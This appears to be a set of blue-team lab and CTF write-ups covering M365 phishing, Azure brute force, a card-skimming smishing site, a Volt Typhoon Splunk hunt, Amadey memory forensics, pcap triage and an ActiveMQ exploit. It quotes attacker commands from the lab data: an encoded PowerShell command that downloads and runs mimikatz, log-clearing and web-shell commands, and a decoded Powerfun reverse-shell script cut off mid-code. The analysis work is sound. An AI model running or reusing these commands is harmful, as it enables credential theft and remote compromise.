A Microsoft Defender incident has been triggered by an analytics rule matching known IOCs tied to the Scattered Spider threat group. You’ll take on the role of a security analyst tasked with investigating the incident from initial detection to post-compromise activity.

Objectives

Investigate a security incident detected by Microsoft Defender Identify malicious behavior through analysis of the different log sources Track actor movement and actions in the environment

Question 1

How many users received the internal phishing lure related to the “bonus” theme?
This one was quick, knowing we already have the email messages logs, I just built the following trivial query to find the answer. \

Question 2

We now know the threat actor shared a document via SharePoint. What is the full object ID (URL) of the file that was shared?
Checking on Audit Data Sources available, answer might be likely in one of those two.

Given a document was shared, it had to be uploaded, so this event should help us figuring out what was it.

Checking on the uploaded files we can observe that there is only one related to the “Bonus” lead given in the first question

Question 3

What was the IP address used by the threat actor while performing activities on SharePoint?
Adding as a filter the sharepoint file found inthe previous question and extracting the ClientIP of that action, we were able to find the Source IP of the threat actor.

That IP is tagged as VPN and associated with Malware by VT

Question 4

What is the Object ID of the file accessed by the threat actor using the ‘154.47.30.133’ IP address? (Note: we are not looking for .jpg or image files) Filtering by the FileAccessed Sharepoint Operation value + with the known IP + excluding jpg files, we are able to get the file the TA accessed.

Question 5

An existing inbox rule was modified — what is the name of this inbox rule?

From experience I know that modified inbox rules will have the Operation value of Set-InboxRule, leveraging that filter + the UserId of the compromised user, I was able to get the name of the inbox rule.

Question 6

We asked Isabella to share a screenshot of all her mailbox rules. Notice another interesting rule in the list… From what IP address was this rule created?

If you look at the value of the Name field, it has two dots as a name, which has been one of the most (if not the most) common names in BEC cases, I myself have seen it being used in real BEC compromises. Also notice that it tries to delete the emails coming from any account from the domain acme-suite.com, which is not just a shot in the dark the TA is doing, but it is likely that an account from this tenant was used to compromise this user and wants to avoid the user being able to read any email from it in case they want to notify their email partners.

Expanding further we can find the IP that created the rule.

Question 7

What is the domain targeted in this rule, where all emails are being deleted from? \

From the explanation in the previous answer, the domain is acme-suite.com

Question 8

Interesting, all emails from this domain are being removed. According to the IT administrator, this is a company we’ve done business with in the past. Can you identify the email address associated with this domain? \

As it was a company that it has been doing business in the past, I started searching for any value in the RecipientAddress field that contains the domain, but I was unable to find anything. Then, I tried my luck using the SenderAddress field and I was successful on it.

Question 9

Isabella received a phishing email from the partner domain, which led to her account compromise. How many other users received the same original phishing email that Isabella received?

Checking on the timestamps, Isabella sent the malicious emails on 04/07/2026 10:50:06.232 PM UTC. Filtering for the emails that she received in day that that aren’t internal, and by the fact that question 8 mentions that acme-suite.com is the domain of a company they have worked before + the fact that the TA created an inbox rule so that emails from any address from that domain gets deleted because they could try to notify to their partners that this account has been hacked, we assume that invoices.platform@acme-suite.com is the name of the account that sent the email and compromised Isabella.

Searching for other emails sent from that account we can observe there are indeed a couple sent.

Question 10

Isabella remembers receiving a phishing email and says she opened the link and filled in her details, thinking it was needed to secure her Microsoft 365 account. Now that we know how the threat actor gained access and some of their actions, the remaining question is: was any data stolen? How many unique emails were accessed by the threat actor across all folders?

Question 11

Unfortunately, this wasn’t the only way the threat actor accessed emails. They registered a well-known application used for data exfiltration. What is the name of this application?

The question makes it sound as if the attacker registered a malicious oauth application (T1671). Data exfiltration would be performed by creating an oauth app that has the Mail.Read permissions for “Thunderbird” it would allow the TA to receive the emails of the user that granted the consent.

Checking on all the Operation values available in the AzureActiveDirectory, we can observe that the Consent to application event could tell us something.

Going through the log, we got no name of the application, but we got a ServicePrincipal ID which could help us get some extra information on the OAuth Path.

💡A ServicePrincipal object is created when an OAuth App gets created because the app needs to be represented by a security principal in order to be able to access resources within the tenant.

Filtering why the Add service principal. events + by the Service Principal ID, we only got one log, which then we were able to extract the display name of the malicious OAuth App.

This was not asked, but we can also get the scope of permissions given to the oauth app. As we can observe there are several of them including able to modify the mails/mailbox item, access to calendar, contacts and user data. Notice the presence of offline_access, which allows the oath app to get a refresh token to get persistent access and not only an access token which would be available for around an hour.

You are tasked with investigating security risks in Secure Corp’s Azure environment, focusing on misconfigured service principals. Recent audits identified that several service principals have overly broad permissions, posing a potential threat for privilege escalation and unauthorized access to sensitive resources.

The first thing I’m doing is familiarizing myself with the data. I’ve never truly deep dived into data from Azure RBAC. within Activity Logs, so I want to get familiarized with it.2

I just started into googling those logs, and the AI summary revealed that it is part of the AzureActivity table which from my built knowledge, I know it refers to the Azure Activity Log events.

Since part of work responsibilities through the years was working in incidents, I have had the need before to dig into Microsoft logs, and often I reference the multiple audit log schema reference sites that MSFT has for different type of events. Here are a few of sites I’ve used before to know greater detail about their logs in case that you haven’t checked them out: Audit log activities, Detailed activity properties in the audit log, Office 365 Management Activity API schema, Learn about the monitoring and health activity log schemas - Microsoft Entra ID.

Naturally, I went into searching for the Azure Audit Log event schema to understand better what logs I am looking at.

After going through this it kind of gives me a sense of not being that lost as it lists all the fields available on each of the categories found.

Going back into Elastic, I want to know what data sources I am working on. By googling, it seems that the event.dataset field. After looking at it, we can notice there’s three data sources:

1. Azure Activity Logs
2. Azure Platform Logs (which after googling they are -> “Azure Monitor Logs”)
3. Azure Sign In Logs (Entra Sign In Logs)

Another field that could be of use would be the event.action field, that lists several activities involved with storage events mainly…

Question 1

Identify and determine the ip addresses associated with the brute forcing activity.
R= 36.255.87.7 , 36.255.87.5

Checking on the azure.platformlogs (Azure Monitor) Sign In Logs, I discarded this option as there was only 8 events all successful, which is not an indicator of a bruteforce attack.

Checking into the logs with the most amount of entries (GetBlob event action), we can observe that there seems to be attempts of reading a blob, with no authentication provided (azure.activitylogs.identity.type == Anonymous) which failed (“Conflict (HTTP Status Code: 409)” according to Azure Activity Log event schema ).

Another data point is that this attempt comes from India, which along with the fact that it’s attempting to read a blob using Anonymous access (and failed) it is worth it to list the multiple values seen in these fields to know with how many different values are we dealing with (thus proving [or not] a brute force attack.)

With the following search we are able to prove that 36.255.87.7 and 36.255.87.5 were doing brute force attempts against blob resources.

FROM az-storage-01
  | WHERE `event.dataset` == "azure.activitylogs" AND `event.action` == "GetBlob"
  | STATS COUNT(), VALUES(azure.activitylogs.category), VALUES(azure.activitylogs.identity.type), VALUES(azure.activitylogs.operation_name), VALUES(azure.activitylogs.statusCode), VALUES(azure.activitylogs.statusText), VALUES(azure.activitylogs.uri), VALUES(azure.resource.id), VALUES(geo.city_name), VALUES(geo.country_iso_code), VALUES(source.as.organization.name) BY source.ip

Question 2

Identify and determine the userAgentHeader associated with the brute forcing activity.
R=Wfuzz/3.1.0

We can observe that there’s a “wfuzz” reference in the user agent, already knowing that “fuzzing” is an automated process that inputs data to systems to identify bugs, vulnerabilities, etc; this is the brute force activity we are looking for.

We weren’t able to setup your package deliver because the address that you provided doesn’t match with the postal code, update in: https[://]estafetaems[.]top/mc.

It’s clearly this is one of those mass sent smishing, but what is the purpose of these? Let’s explore…

Checking the WHOIS record, there are two red flags about this domain:

1. The domain was bought from those websites that sell low-cost domains.

2. The domain was just bought a day ago (at the time of this writing), which no legit domain is usually this young.

Leveraging tria.ge to explore the site, at first glance, we can see that it attempts to impersonate the estafeta site, even though it seems like an older version of the current one, as we can observe the clear differences with the second screenshot which is the current website.

Checking at the resources contained in the website, we have proof that this site was cloned towards the end of the year 2023 (likely December).

Checking the .js file, we can observe that there are some comments in chinese, which means one of two things: the threat actors are chinese/familiarized with chinese or whatever code they copied this from was written by chinese/familized with chinese.

As soon as the user stops writing, the data is sent to the endpoint /api/input, along with the timestamp in epoch.

The server then replies with a code: 0.

Within the request, there’s interesting information that gives us more information on the threat actor infrastructure:

1. The Server field is GoFrame HTTP Server. When googling it, we can see that the first result is in Chinese, within that website there’s a QR code so that we can follow the project in WeChat, which is a social media platoform only used in China. If we piece together the two evidences that we have until now (comments written in Chinese and the use of an opensource web server that prompts the users to follow them using WeChat), we can confidently state that the attacker/s is from China.

2. There’s a Via field with the value of 1.1 Caddy. I’ve found in Google that Caddy is a:

   Caddy sports a flexible and powerful HTTP reverse proxy, on-line configuration API, and a robust, production-ready static file server, and serves all sites over HTTPS by default with automagic TLS certificates.

3. The field Sec-Ch-Ua-Platform with the value of Windows, let us know that it is able to automatically identify the platform connecting to the site.
4. There’s a Token field, which is unknown at the time what’s its purpose.

Once we hit Submit, we are then prompted to insert our credit card information.

Once we entered the information (and it was being sent at the same time it was being written), once we submitted it, a secure web socket (wss://) request was sent to the endpoint /ws with the previously seen token being passed as argument.

Within that same request, in the result_type event, we are able to observe the data that was transmitted to the server, the app is able to determine whether or not if the card number is a valid one or not from the first digits (as in another attempt I invented all the names, in this case I put only the initial real numbers from an HSBC card).

When you submit the info, at the end it redirects you to the legit estafeta.com website

Reference

(tria.ge)[https://tria.ge/250624-t3qmhswvez/behavioral1]

Comb through the ADSelfService Plus logs to begin retracing the attacker’s steps. At what time (ISO 8601 format) was Dean’s password changed and their account taken over by the attacker?

R= 2024-03-24T11:10:22

The question mentions that we should look into the ADSelfService Plus logs, checking in the values of the sourcetype field, we can observe that there’s one that matches with its starting letters.

As we are looking for a password change and its account take over, we look into the username field for any value indicating that the owner could be Dean. We found one: dean-admin, lets filter by that value.

Using the query below to get only the fields of interest, I was able to track down the ip from where the TA tried multiple attempts of account unlock and where at the end it was able to take over the account by resetting its password and it being successful.

index=* sourcetype=adss  | search username="dean-admin" 
|  table timestamp, ip_address, action_name, status
| reverse

2. Shortly after Dean’s account was compromised, the attacker created a new administrator account. What is the name of the new account that was created?

R= voltyp-admin

Leveraging Date & Time Range feature, we filter for logs after the timestamp of the Password Change ADSelfService event. We can observe that the account voltyp-admin was immediately created after the account takeover.

Execution

3. In an information gathering attempt, what command does the attacker run to find information about local drives on server01 & server02?

R= wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename

Going back into the data lake of logs, we indeed have a sourcetype for wmi that we can explore in. As the server field wasn’t parsed, I used the following regex ^.*\|.*\|\s(?<server>server-0\d{1}-main).*\| to get the names of the server we were interested in. As we can see it is indeed working Checking for any commands that could give information on disk using wmic, there are three in specific. Using the following query, I was able to notice that there was indeed a command that targeted server01 and server02, so what I just did was me being confused but at least served to practice my regex, same thing with the query below, is definitely not be the best way to find the answer.

index=* sourcetype=wmic
| where isnotnull(server) // Contains string server-0[1 OR 2]-main
| search command="*disk*" // Contains substring 'disk' in command field
| stats count by command // count how many times each value appears

A better query would be the following:

index=* sourcetype=wmic 
| search command="*server0*" // search for any wmi command that contains the
								substring 'server0'
| table timestamp, ip_address, username, command

4. The attacker uses ntdsutil to create a copy of the AD database. After moving the file to a web server, the attacker compresses the database. What password does the attacker set on the archive?

R= d5ag0nm@5t3r

Doing a free text search for ntdsutil.exe we got a match for the command that created a copy of the AD database. Looking for any events after that time, and filtering by the user dean-admin, we are able to find the compression command:

wmic /node:webserver-01 process call create “cmd.exe /c 7z a -v100m -p d5ag0nm@5t3r -t7z `cisco-up.7z` C:\inetpub\wwwroot\temp.dit”

Persistence

5. To establish persistence on the compromised server, the attacker created a web shell using base64 encoded text. In which directory was the web shell placed?

R= C:\Windows\Temp\

I wasn’t sure where to start here, but I knew that because there was some base64 involved, the attacker must have used some command that had the word decode in it, and I was correct. In this case it leveraged the LOLB certuil.exe. In this case the webshell was inserted into the %TEMP% folder C:\Windows\Temp\

Defense Evasion

6. In an attempt to begin covering their tracks, the attackers remove evidence of the compromise. They first start by wiping RDP records. What PowerShell cmdlet does the attacker use to remove the “Most Recently Used” record?

R=Remove-ItemProperty

I thought in doing a free search for Remove-Item, because the MRU is located in the registry path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where we can only remove items from from a registry location using the Remove-ItemProperty. The attacker effectively removed the MRU record using the cmdlet `Remove-ItemProperty

7. The APT continues to cover their tracks by renaming and changing the extension of the previously created archive. What is the file name (with extension) created by the attackers?

R= cl64.gif

The previously created file was cisco-up.7z (Q4), if we do a free search for it, there’s a log indicating that the attacker renamed it to cl64.gif using the command below.

cmd.exe /c ren \\webserver-01\c$\inetpub\wwwroot\cisco-up.7z cl64.gif

8. Under what regedit path does the attacker check for evidence of a virtualized environment?

R= HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

Doing a free search for HKEY_LOCAL_MACHINE, as there’s where the configuration of the computer is stored in, one of the three matches shows that the attacker executed

Get-ItemProperty -Path "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" | Select-Object -Property *Virtual*

After finding the answer, I tried to google that method to confirm that it is documented as evidence of a virtualized environment but got no luck. I just tested my lick when doing that free text search.

Credential access

9. Using reg query, Volt Typhoon hunts for opportunities to find useful credentials. What three pieces of software do they investigate?

R= openssh, putty, realvnc

I searched for free text reg query, as the field that contained the full command wasn’t parsed, I leveraged the reg built-in Splunk command to create a new field named raw leveraging Named Capture Groups that matches the entire command. As seen, the software investigated was openssh, putty, realvnc

index=* "*reg query*" 
| rex field=_raw "(?<cmd>reg query\s.*)"
| table cmd // show only the field cmd
| reverse

10. What is the full decoded command the attacker uses to download and run mimikatz?

R= Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe"; Start-Process -FilePath "C:\Temp\db2\mimikatz.exe" -ArgumentList @("sekurlsa::minidump lsass.dmp", "exit") -NoNewWindow -Wait

I wasn’t sure where to start here, but I supposed that there was an encoded a powershell command executed somewhere. Knowing this I started by parsing the entire value of the CommandLine= raw field, and skimmed through all the values found that end in =. Query used:

index=* sourcetype!=adss sourcetype!=wmic  | rex field=_raw "CommandLine=(?<cmd>.*=)" 
| stats count by cmd 
| sort -count

Malicious command

-exec bypass -W hidden -nop -E SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovL3ZvbHR5cC5jb20vMy90bHovbWltaWthdHouZXhlIiAtT3V0RmlsZSAiQzpcVGVtcFxkYjJcbWltaWthdHouZXhlIjsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFRlbXBcZGIyXG1pbWlrYXR6LmV4ZSIgLUFyZ3VtZW50TGlzdCBAKCJzZWt1cmxzYTo6bWluaWR1bXAgbHNhc3MuZG1wIiwgImV4aXQiKSAtTm9OZXdXaW5kb3cgLVdhaXQ=

Using CyberChef, I decoded the command.

Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe"; Start-Process -FilePath "C:\Temp\db2\mimikatz.exe" -ArgumentList @("sekurlsa::minidump lsass.dmp", "exit") -NoNewWindow -Wait

Discovery & Lateral Movement

11. The attacker uses wevtutil, a log retrieval tool, to enumerate Windows logs. What event IDs does the attacker search for?

R= 4624 4625 4769

By parsing the entire CommandLine value, and by searching for all the fields that start with wevtutil, we were able to get all the commands showing the event id’s searched.

index=* sourcetype!=adss sourcetype!=wmic  | rex field=_raw "CommandLine=(?<cmd>.*=)" 
| search cmd="wevtutil*"
| table cmd

To practice named capture groups, I’ll extract the single event ID and put it into a new field called event_id.

index=* sourcetype!=adss sourcetype!=wmic  | rex field=_raw "CommandLine=(?<cmd>.*=)"
| search cmd="wevtutil*"   // search for values that start with wevtutil
| rex field=_raw ".*EventID=(?<event_id>\d{4}).*"   // extract eventid
| table event_id    // show only event_id field
| stats count by event_id    // count each of the values

12. Moving laterally to server-02, the attacker copies over the original web shell. What is the name of the new web shell that was created?

R= Copy-Item -Path "C:\Windows\Temp\iisstart.aspx" -Destination "\\server-02\C$\inetpub\wwwroot\AuditReport.jspx

As the questioned said “Copy”, one of the possibilities could be that the attacker could’ve used the Copy-Item cmdlet. I free text searched for *copy*, and this is the last entry that was found and the only one that indicated that was explicitly transferred to server-02

Copy-Item -Path "C:\Windows\Temp\iisstart.aspx" -Destination "\\server-02\C$\inetpub\wwwroot\AuditReport.jspx

Collection

13. The attacker is able to locate some valuable financial information during the collection phase. What three files does Volt Typhoon make copies of using PowerShell?

R=2022.csv 2023.csv 2024.csv

Leveraging the free text search for Copy, and then extracting the value of the CommandLine field, I was able to review copied items and found three related to financial data.

Copy-Item -Path "C:\ProgramData\FinanceBackup\2024.csv" -Destination "C:\Windows\Temp\faudit\2024.csv"
Copy-Item -Path "C:\ProgramData\FinanceBackup\2023.csv" -Destination "C:\Windows\Temp\faudit\2023.csv"
Copy-Item -Path "C:\ProgramData\FinanceBackup\2022.csv" -Destination "C:\Windows\Temp\faudit\2022.csv"

C2 & Cleanup

14. The attacker uses netsh to create a proxy for C2 communications. What connect address and port does the attacker use when setting up the proxy?

R= 10.2.30.1 8443

Doing a free text search for netsh, it have a couple of results that indicate that a proxy was created then deleted.

Looking further at it, the attacker uses the address 10.2.30.1 and port 8443 to setup the proxy.

15. To conceal their activities, what are the four types of event logs the attacker clears on the compromised system?

R= wevtutil cl Application Security Setup System

The wevtutil LOLBIN, provides an argument that allows to clear the log with it.

If we search for it using the query below, we were able to determine the type of event logs the attacker cleared.

index=* sourcetype=powershell | rex field=_raw "CommandLine=(?<cmd>.*)" 
| search cmd="wevtutil cl*"   // search for any cmd field value that starts with
							     wevtutil cl
| table cmd

An after-hours alert from the Endpoint Detection and Response (EDR) system flags suspicious activity on a Windows workstation. The flagged malware aligns with the Amadey Trojan Stealer. Your job is to analyze the presented memory dump and create a detailed report for actions taken by the malware.

Questions

1. In the memory dump analysis, determining the root of the malicious activity is essential for comprehending the extent of the intrusion. What is the name of the parent process that triggered this malicious behavior?

R= lssass.exe

Taking a look, using the command python3 vol.py -f "../../Artifacts/Windows 7 x64-Snapshot4.vmem" windows.pstree, we observe that there are two processes that look off to me, PID 1604 and 2748. 1604 is a VMWare Tools core component which handlex background tasks, to my knowledge, it should be straight up executing a cmd.exe which calls for ipconfig.exe. The other process that looks very off is lssass.exe (PID 2748), as you can tell by simply looking at the name, it is trying to make the user believe that it is the core process lsass.exe (which we can see it seven processes above [PID 508]).

Now, using the plugin windows.cmdline to look at the commandline that was executed for each of the processes, we can see that lssass.exe is located in the publicly writable %TEMP% folder, which is a well-known location that threat actors leverage to put their malicious payloads in. Also, if we look one line under, its child rundll.exe (PID 3064) is executing a dll called clip64.dll. Googling up this dll, it is referenced in the Data Collection And Exfiltration (.DLL Plugins) section in a blog of the Splunk Threat Research Team. According to them, clip64.dll is one of two dlls that “…play a crucial role in collecting sensitive information…”

With the previous evidence, we have more than enough to state that lssass.exe is the disguised Amadey Trojan Stealer.

2. Once the rogue process is identified, its exact location on the device can reveal more about its nature and source. Where is this process housed on the workstation?

R= C:\Users\0XSH3R~1\AppData\Local\Temp\925e7e99c5\lssass.exe

As we saw in the evidence provided in last’s question answer, the file is located in C:\Users\0XSH3R~1\AppData\Local\Temp\925e7e99c5\

3. Persistent external communications suggest the malware’s attempts to reach out C2C server. Can you identify the Command and Control (C2C) server IP that the process interacts with?

R= 41.75.84.1

Leveraging the plugin windows.netscan, it’s notorious that the information in the first entry is malformed, lacking values in source ip/source port and the destination port is 0. On the other side, there were two connection attempts to 41.75.84.12 - both which have logical information.

4. Following the malware link with the C2C, the malware is likely fetching additional tools or modules. How many distinct files is it trying to bring onto the compromised workstation?

R= 2

By looking for GET requests, we can see that it has two GET requests for /rock/Plugins/cred64.dll and /rock/Plugins/clip64.dll.

5. Identifying the storage points of these additional components is critical for containment and cleanup. What is the full path of the file downloaded and used by the malware in its malicious activity?

R= C:\Users\0xSh3rl0ck\AppData\Roaming\116711e5a2ab05\clip64.dll

Leveraging the windows.cmdline plugin, the file path is C:\Users\0xSh3rl0ck\AppData\Roaming\116711e5a2ab05\clip64.dll

6. Once retrieved, the malware aims to activate its additional components. Which child process is initiated by the malware to execute these files?

R= rundll32.exe

From the screenshot in Q5, we can observe rundll32.exe was the process that executed clip64.dll

7. Understanding the full range of Amadey’s persistence mechanisms can help in an effective mitigation. Apart from the locations already spotlighted, where else might the malware be ensuring its consistent presence?

R= C:\Windows\System32\Tasks\lssass.exe

Scanning the filesystem for files that have been recently accessed, we can see that there’s another location where lssass.exe was written in.

You work as an analyst at a Security Operation Center (SOC). Someone contacts your team to report a coworker has downloaded a suspicious file after searching for Google Authenticator. The caller provides some information similar to social media posts at:

https://www.linkedin.com/posts/unit42_2025-01-22-wednesday-a-malicious-ad-led-activity-7288213662329192450-ky3V/ https://x.com/Unit42_Intel/status/1882448037030584611 Based on the caller’s initial information, you confirm there was an infection. You retrieve a packet capture (pcap) of the associated traffic. Reviewing the traffic, you find several indicators matching details from a Github page referenced in the above social media posts. After confirming an infection happened, you begin writing an incident report.

LAN SEGMENT DETAILS FROM THE PCAP

LAN segment range: 10.1.17[.]0/24 (10.1.17[.]0 through 10.1.17[.]255)
Domain: bluemoontuesday[.]com
Active Directory (AD) domain controller: 10.1.17[.]2 - WIN-GSH54QLW48D
AD environment name: BLUEMOONTUESDAY
LAN segment gateway: 10.1.17[.]1
LAN segment broadcast address: 10.1.17[.]255

Questions

1. What is the IP address of the infected Windows client?
R= 10.1.17.215

From what was reported (phishing through “google authenticator” impersonation site, we can see the IP 10.1.17.215 connecting to the suspected site

Filter used: (http.request or tls.handshake.type eq 1) and !(ssdp)

2. What is the mac address of the infected Windows client?
R= 00:d0:b7:26:4a:74

Looking into the ethernet frame, we can get its mac

3. What is the host name of the infected Windows client?
R= DESKTOP-L8C5GSJ

The NETBIOSprotocol, allows us to know the hostname of the device

4. What is the user account name from the infected Windows client?
R= shutchenson

Looking into the Protocol Hierarchy Statistics, I determined that the Kerberos protocol will give us a username.

The identity is located in the CNameString field.

5. What is the likely domain name for the fake Google Authenticator page?
R= google-authenticator.burleson-appliance.net

From the threat intel given in the Background section, the malicious sites were under the domain burleson-appliance.net. As shown in Q1, there’s a site called google-authenticator.burleson-appliance.net, which matches what was previously seen.

During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.

Questions

1. By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?
R= 146.190.21.92
Looking at the Conversations statistics, the third row seems to stand out, as it’s the one that has the larger amount of packets and duration as well.

The first HTTP request, is a GET type, where 134.209.197.3 is retrieving invoice.xml from 146.190.21.92 using port 8000.

Looking into the details of the response from the destination, the xml file contains instructions to retrieve the file docker from 128.199.52.72, save it as /tmp/docker, give execute rights (using chmod +x) and then executing the file.

Here we can see the three way handshake to the IP aforementioned, and the successful retrieval of the file.

In this case, the C2 IP is 146.190.21.92 as it`s the one orchestrating the actions required to further compromise the server.

2. Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?
R= 61616
In this case, the threat actor exploited the ActiveMQ service, which uses port 61616.

That makes sense, as the user agent of the first file retrieved invoice.xml is from Java.

3. Following up on the previous question, what is the name of the service found to be vulnerable?
R= apache activemq

4. The attacker’s infrastructure often involves multiple components. What is the IP of the second C2 server?
R= 128.199.52.72
As mentioned in Q1, the second stage payload docker was downloaded from 128.199.52.72

5. Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?
R= docker
So far, the only file that we have that we don’t know what it does is the one named docker. If we extract it using the Export > HTTP object list, and then submit it to virustotal, we can see that it detects it as shellcode (code that allows an attacker to get access to the system by spawning a command shell).

6. What Java class was invoked by the XML file to run the exploit?
R= java.lang.ProcessBuilder
Looking into the xml, we can confirmed that the class java.lang.ProcessBuilder was invoked

7. To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?
R= CVE-2023-46604
Searching in google activemq port 61616 exploit, the activity described matches with what we saw.

https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604

8. As part of addressing the vulnerability, the vendor implemented a validation step to prevent exploitation. Specify the Java class and method where this validation step was added.
R= BaseDataStreamMarshaller.createThrowable
In https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt, it mentions that the issue is tracked as AMQ-9370.

Looking into that issue, we end in the source code of changes. The change was actually done in multiple versions of the software (as expected). All of them under the class BaseDataStreamMarshaller and method createThrowable

This is the first challenge of the course from TCM Academy called “Practical Malware Analysis & Triage”.

Challenge Questions:

Basic Static Analysis

• What is the SHA256 hash of the sample?
  R= 0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83
  

• What architecture is this binary?
  R= Using PEstudio, we can confirm it is a 32-bit binary.
  

• Are there any results from submitting the SHA256 hash to VirusTotal?

  R= Yes, it is widely detected by anti-virus engines. It’s interesting that it is detected as “meterpreter” from the “Threat Label”. We now know in advanced that most likely this is the payload from metasploit.

• Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?

  R= No interesting strings

• Describe the results of inspecting the IAT for this binary. Are there any imports worth noting?

  R= Checks for the presence of debuggers with function IsDebuggerPresent
  

• Is it likely that this binary is packed?

  R= No, way too many visible ASCII strings for the binary to be packed

  Basic Dynamic Analysis

• Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?

  R= Without internet simulation, what looks to be a powershell windows shows up briefly, and then the common “putty” window pops-up.

  With internet simulation, a powershell windows stays open for a few seconds, then it dissapears. At the end, we are left with the same well-known “putty” window.

• From the host-based indicators perspective, what is the main payload that is initiated at detonation? What tool can you use to identify this?

  R= Having procmon turned on beforehand, with a filter to only get the activity performed by the process putty.exe, we were able to track it’s activity and from there pivot over to its process tree; where we were able to get the command executed by the powershell windows we saw in the initial detonation.

   powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
  

  

• What is the DNS record that is queried at detonation?

  R= bonus2[.]corporatebonusapplication[.]local

• What is the callback port number at detonation?

  R= 8443

  In order to answer this question, I needed to figure how to get the main payload (base64 string) into ASCII.Looking into each of the functions that it is performing it performs the following:

  1. Decodes the string from base64
  2. Stores decoded output into memory
  3. Decompresses from gzip compression
  4. Reads code from memory
  5. Executes the code

  I figured that I might be able to decode this using CyberChef,following the same process, I decoded the string using the “From Base64” CyberChef function, and then the “Gunzip” to decompress the data with gzip headers, then I was able to take a peek at the plain-text code.

  

  The first line caught my eye, as it seems that the Threat Actor has used a very likely open source red team tool. Doing a little of google-fu, the authors presented a conference talk in 2015 talking about this tool, which basically allows to run an interactive powershell session in the victim host through metasploit.

  

  Full code:

     
     
  # Powerfun - Written by Ben Turner & Dave Hardy
     
  function Get-Webclient 
  {
      $wc = New-Object -TypeName Net.WebClient
      $wc.UseDefaultCredentials = $true
      $wc.Proxy.Credentials = $wc.Credentials
      $wc
  }
  function powerfun 
  { 
      Param( 
      [String]$Command,
      [String]$Sslcon,
      [String]$Download
      ) 
      Process {
      $modules = @()  
      if ($Command -eq "bind")
      {
          $listener = [System.Net.Sockets.TcpListener]8443
          $listener.start()    
          $client = $listener.AcceptTcpClient()
      } 
      if ($Command -eq "reverse")
      {
          $client = New-Object System.Net.Sockets.TCPClient("bonus2.corporatebonusapplication.local",8443)
      }
     
      $stream = $client.GetStream()
     
      if ($Sslcon -eq "true") 
      {
          $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
          $sslStream.AuthenticateAsClient("bonus2.corporatebonusapplication.local") 
          $stream = $sslStream 
      }
     
